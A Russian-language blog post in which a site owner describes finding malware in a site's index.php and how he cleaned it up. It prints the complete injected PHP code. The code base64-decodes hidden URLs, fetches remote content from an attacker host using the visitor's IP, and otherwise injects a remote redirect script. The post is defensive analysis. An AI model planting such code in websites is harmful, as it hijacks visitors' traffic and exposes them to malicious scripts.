Рейтинг@Mail.ru

На сайте обнаружен потенциально опасный код

Итак, на вашем сайте обнаружен потенциально опасный код.
На страницах сайта обнаружен вредоносный код. На страницах вашего сайта обнаружен код, который может быть опасен для посетителей. В настоящий момент сайт выводится в результатах поиска с пометкой Этот сайт может угрожать безопасности вашего компьютера.


Проверяем сайт онлайн-антивирусом, и выясняем что на странице выполняется непонятный Java-скрипт, а попросту – malware, редиректящий трафик с вашего сайта на подставные для накрутки посещаемости.
http://feelthesame.changeip.name/rsize.js
Понятное дело, что поиском по коду страницы вы ничего не найдете. Скорее всего, вредоносный код прописался в index.php. Вот так выглядит вредоносный ко:

function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

		if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
		$ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
		$content = @file_get_contents($get);
		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;

		}
}
collectnewss ();

Как видите, ссылка на левый сайт замаскирована с помощью base64 кодировки, который вызывается здесь же заданной новой функцией. Если раскодировать билеберду в кавычках, то как раз и получаются ссылки на чужие сайты и левые скрипты.
Для Drupal, Joomla и прочих CMS код будет тот же самый, так как он заражает все без разбору. Вычищаем файл, и оставляем заявку на перепроверку сайта. Остается вопрос – как же вирус попал на страницы вашего сайта? Первая мысль – дыра в безопасности движка сайта. Однако чуть позже удалось обнаружить странные подключения к сайту по FTP, а FTP доступ с движком не связан ну никак. Учитывая что сам я во-первых использую сложные пароли и никогда не храню их в открытом виде, а во-вторых редко захожу по FTP, то скорее всего пароли слил сам хостинг-провайдер. Так что меняем все пароли, причем не только на FTP, ну и на всякий случай апдейтим движок сайта до последней версии.

Leave a Comment